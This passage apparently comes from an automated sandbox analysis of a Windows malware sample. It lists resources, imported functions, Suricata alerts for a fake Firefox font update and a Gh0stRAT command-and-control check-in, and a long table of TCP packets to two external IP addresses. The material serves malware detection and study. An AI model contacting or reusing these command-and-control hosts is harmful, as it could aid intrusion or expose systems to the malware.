                                                                        RT_GROUP_ICON0x1d87a8c0x14dataEnglishUnited States1.1
                                                                        RT_GROUP_ICON0x1d87aa00x68dataEnglishUnited States0.7692307692307693
                                                                        RT_VERSION0x1d87b080x39cdataEnglishUnited States0.4653679653679654
                                                                        RT_MANIFEST0x1d87ea40x580XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1348), with CRLF line terminatorsEnglishUnited States0.4403409090909091

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllGetExitCodeProcess, CreateProcessW, FreeLibrary, GetModuleFileNameW, LoadResource, LockResource, WaitForSingleObject, FindResourceW, LoadLibraryW, CreateFileW, GetConsoleMode, GetLastError, CloseHandle, SizeofResource, GetFileAttributesW, GetConsoleOutputCP, FlushFileBuffers, HeapReAlloc, HeapSize, SetFilePointerEx, GetProcessHeap, LCMapStringW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, GetFileType, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetStringTypeW, VirtualAlloc
                                                                        USER32.dllMessageBoxW, wsprintfW
                                                                        ADVAPI32.dllRegOpenKeyExW, RegCloseKey, RegQueryValueExW
                                                                        SHELL32.dllShellExecuteExW
                                                                        SHLWAPI.dllPathCanonicalizeW, PathRemoveFileSpecW, PathCombineW
                                                                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2025-01-14T05:10:59.145726+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.204975339.103.20.17443TCP
                                                                        2025-01-14T05:11:00.733114+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.204975539.103.20.17443TCP
                                                                        2025-01-14T05:11:03.139401+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.204975739.103.20.17443TCP
                                                                        2025-01-14T05:11:04.922689+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.204975839.103.20.17443TCP
                                                                        2025-01-14T05:11:06.263351+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.204975939.103.20.17443TCP
                                                                        2025-01-14T05:11:15.360937+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.204976039.103.20.17443TCP
                                                                        2025-01-14T05:11:18.741160+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.11.204976139.103.20.17443TCP
                                                                        2025-01-14T05:12:54.993140+01002852901ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin1192.168.11.20497698.217.78.2428917TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Jan 14, 2025 05:10:58.179718018 CET49753443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:58.179801941 CET4434975339.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:58.180003881 CET49753443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:58.181345940 CET49753443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:58.181365967 CET4434975339.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:59.145503044 CET4434975339.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:59.145725965 CET49753443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:59.147082090 CET4434975339.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:59.147458076 CET49753443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:59.149055958 CET49753443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:59.149092913 CET4434975339.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:59.149502039 CET4434975339.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:59.190162897 CET49753443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:59.190655947 CET49753443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:59.234420061 CET4434975339.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:59.535867929 CET4434975339.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:59.535936117 CET4434975339.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:59.536120892 CET49753443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:59.536956072 CET49753443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:59.536956072 CET49753443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:59.536998987 CET4434975339.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:59.537007093 CET4434975339.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:59.758218050 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:59.758261919 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:10:59.758477926 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:59.758660078 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:10:59.758696079 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:00.732821941 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:00.733114004 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:00.735697985 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:00.735980034 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:00.737937927 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:00.737982035 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:00.738969088 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:00.739692926 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:00.782227993 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.091902018 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.091953039 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.092067003 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.092116117 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.092178106 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.092327118 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.092370033 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.092638016 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.092686892 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.093058109 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.408620119 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.408847094 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.408943892 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.408994913 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.409028053 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.409212112 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.409365892 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.409531116 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.409636974 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.409686089 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.409719944 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.409933090 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.410067081 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.410295963 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.447690964 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.448049068 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.727065086 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.727278948 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.727416039 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.727642059 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.727739096 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.727952003 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.727997065 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.728202105 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.728252888 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.728391886 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.728634119 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.728873014 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.729089975 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.729137897 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.729357958 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.729449034 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.729633093 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.729793072 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.729948997 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.730351925 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.730509043 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.730551958 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.730701923 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.767432928 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.767580986 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.767745018 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.767795086 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:01.767828941 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:01.767983913 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.053462029 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.053750992 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.053925037 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.054141045 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.054163933 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.054183960 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.054393053 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.054742098 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.054924965 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.054934025 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.054980993 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.055120945 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.055265903 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.055490017 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.055529118 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.055648088 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.055711031 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.055754900 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.055855989 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.056091070 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.056361914 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.056401014 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.056546926 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.056569099 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.056617022 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.056752920 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.056871891 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.057038069 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.057079077 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.057185888 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.057326078 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.057352066 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.057372093 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.057501078 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.057652950 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.057667971 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.057703018 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.057718992 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.057843924 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.057843924 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.058654070 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.058654070 CET49755443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.058689117 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.058701038 CET4434975539.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.170236111 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.170288086 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:02.170495987 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.170694113 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:02.170734882 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.139137983 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.139400959 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.140115023 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.140348911 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.142556906 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.142575979 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.142968893 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.144135952 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.186269999 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.493597984 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.493649960 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.493709087 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.493865967 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.493865967 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.493889093 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.493904114 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.499582052 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.499963999 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.500001907 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.500335932 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.502739906 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.503344059 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.509319067 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.509656906 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.512636900 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.512984037 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.515872002 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.516103983 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.522401094 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.522747040 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.525531054 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.525818110 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.531963110 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.532319069 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.535151005 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.535486937 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.538477898 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.538836002 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.544688940 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.544943094 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.548275948 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.548629999 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.554666996 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.554956913 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.806541920 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.806802034 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.809216022 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.809442043 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.809489012 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.809585094 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.809681892 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.809724092 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.809755087 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.815294981 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.815536976 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.815578938 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.815759897 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.822252989 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.822483063 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.828536034 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.828763962 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.828826904 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.829031944 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.831531048 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.831825018 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.834847927 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.835114956 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.838574886 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.838768005 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.845000029 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.845253944 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.845297098 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.845501900 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.850997925 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.851207972 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.854090929 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.854302883 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.854348898 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.854525089 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.857326031 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.857568979 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.863883972 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.864085913 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.864109993 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.864306927 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.867302895 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.867559910 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.911772966 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.911923885 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.912005901 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.912062883 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.912489891 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.912489891 CET49757443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.912532091 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.912539959 CET4434975739.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.953001976 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.953039885 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:03.953274965 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.953424931 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:03.953443050 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:04.922441959 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:04.922688961 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:04.924776077 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:04.925143003 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:04.926145077 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:04.926225901 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:04.927099943 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:04.927798986 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:04.970313072 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:05.261033058 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:05.261090040 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:05.261385918 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:05.261444092 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:05.261522055 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:05.261610031 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:05.261643887 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:05.261706114 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:05.261771917 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:05.261835098 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:05.261981964 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:05.262037039 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:05.262197971 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:05.262198925 CET49758443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:05.262264013 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:05.262281895 CET4434975839.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:05.289334059 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:05.289448977 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:05.289797068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:05.289921045 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:05.289961100 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.263093948 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.263350964 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.265959024 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.266182899 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.267225981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.267272949 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.268234015 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.269032955 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.310244083 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.626730919 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.626771927 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.627031088 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.627058983 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.627105951 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.627245903 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.633380890 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.633632898 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.636573076 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:06.636827946 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:06.642914057 CET4434975939.103.20.17192.168.11.20
